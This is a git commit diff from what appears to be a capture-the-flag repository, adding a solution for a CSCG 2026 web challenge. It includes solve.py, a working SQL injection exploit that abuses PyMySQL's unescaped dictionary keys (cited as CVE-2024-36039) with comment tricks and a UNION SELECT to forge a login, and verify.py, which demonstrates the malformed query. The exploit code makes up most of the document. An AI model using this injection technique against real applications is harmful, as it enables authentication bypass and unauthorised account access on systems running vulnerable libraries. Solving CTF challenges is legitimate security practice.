cscg is loooong
This commit is contained in:
1
2026/cscg/web/ass/.gitignore
vendored
Normal file
1
2026/cscg/web/ass/.gitignore
vendored
Normal file
@@ -0,0 +1 @@
|
||||
src
|
||||
BIN
2026/cscg/web/ass/ass.zip
Normal file
BIN
2026/cscg/web/ass/ass.zip
Normal file
Binary file not shown.
1
2026/cscg/web/ass/exploit/.python-version
Normal file
1
2026/cscg/web/ass/exploit/.python-version
Normal file
@@ -0,0 +1 @@
|
||||
3.13
|
||||
7
2026/cscg/web/ass/exploit/pyproject.toml
Normal file
7
2026/cscg/web/ass/exploit/pyproject.toml
Normal file
@@ -0,0 +1,7 @@
|
||||
[project]
|
||||
name = "exploit"
|
||||
version = "0.1.0"
|
||||
description = "Add your description here"
|
||||
readme = "README.md"
|
||||
requires-python = ">=3.13"
|
||||
dependencies = []
|
||||
31
2026/cscg/web/ass/exploit/solve.py
Normal file
31
2026/cscg/web/ass/exploit/solve.py
Normal file
@@ -0,0 +1,31 @@
|
||||
import requests
|
||||
import hashlib
|
||||
|
||||
BASE_URL = "https://usylj6lnspfp6iquvda5y7tlxu-5000-ass.challenge.cscg.live/"
|
||||
TOKEN = "crazypassword"
|
||||
|
||||
def password_hash(password: str) -> str:
|
||||
return hashlib.sha256(password.encode()).hexdigest()
|
||||
|
||||
token_hash = password_hash(TOKEN)
|
||||
print(f"[*] Hash: {token_hash}")
|
||||
|
||||
# 1. First key: Parses as a User object, bypasses quotes, and opens the comment block.
|
||||
# Regex requires: 4-10 chars, 7+ chars, 2 uppercase chars.
|
||||
key_open = "fn/*,1234567,XX"
|
||||
|
||||
# 2. Second key: Because of CVE-2024-36039, PyMySQL does NOT escape dict keys!
|
||||
# Python wraps it in double quotes, but MariaDB will ignore the opening quote
|
||||
# because it falls inside our /* */ comment block.
|
||||
key_payload = "*/ PI()}) UNION SELECT 1,'hacker','" + token_hash + "','us',1 #"
|
||||
|
||||
# Python dicts preserve order!
|
||||
# fn/* comes first, opening the comment.
|
||||
# The payload comes second, closing the comment and injecting.
|
||||
r = requests.post(f"{BASE_URL}/api/auth", json=[{
|
||||
key_open: "irrelevant",
|
||||
key_payload: "also irrelevant",
|
||||
"token": TOKEN
|
||||
}])
|
||||
|
||||
print("[*] Auth:", r.json())
|
||||
21
2026/cscg/web/ass/verify.py
Normal file
21
2026/cscg/web/ass/verify.py
Normal file
@@ -0,0 +1,21 @@
|
||||
# 1. The exact query template from routes.py
|
||||
sql = "SELECT * FROM users WHERE (BINARY CONCAT(principal, ',', region) = %s)"
|
||||
|
||||
# 2. The dictionary payload as it exists after unpack() in routes.py
|
||||
user_dict = {
|
||||
'x" UNION SELECT 1,\'hacker\',\'<hash>\',\'us\',1)-- ': 'irrelevant',
|
||||
'token': 'mytoken'
|
||||
}
|
||||
|
||||
# 3. How routes.py passes it to the query_handler: wrapped in a tuple
|
||||
# cur = query_handler(sql, cur, (user,))
|
||||
params = (user_dict,)
|
||||
|
||||
print("--- Standard Python % Formatting ---")
|
||||
# This is essentially what happens when PyMySQL applies the parameters to the %s placeholder
|
||||
formatted_query = sql % params
|
||||
print(formatted_query)
|
||||
|
||||
print("\n--- Why MariaDB Hates It ---")
|
||||
print(f"Starts with ODBC bracket: {formatted_query[formatted_query.find('{'):formatted_query.find('{')+1]}")
|
||||
print(f"Followed immediately by a quote: {formatted_query[formatted_query.find('{')+1:formatted_query.find('{')+2]}")
|
||||
Reference in New Issue
Block a user